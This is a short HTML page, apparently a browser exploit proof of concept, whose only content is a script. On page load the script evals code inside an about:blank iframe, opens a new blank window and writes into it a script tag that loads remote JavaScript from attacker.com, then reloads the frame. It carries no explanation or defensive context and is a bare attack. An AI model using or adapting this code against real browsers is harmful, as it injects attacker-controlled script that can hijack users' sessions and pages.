<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGZeZyiGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGZeZyiGGGG.onload=_=>GGGGZeZyiGGGG.contentWindow.eval("w=window.open('about:blank'); w.document.write('<script src=https://attacker.com/static/static.js><\/script>');");GGGGZeZyiGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>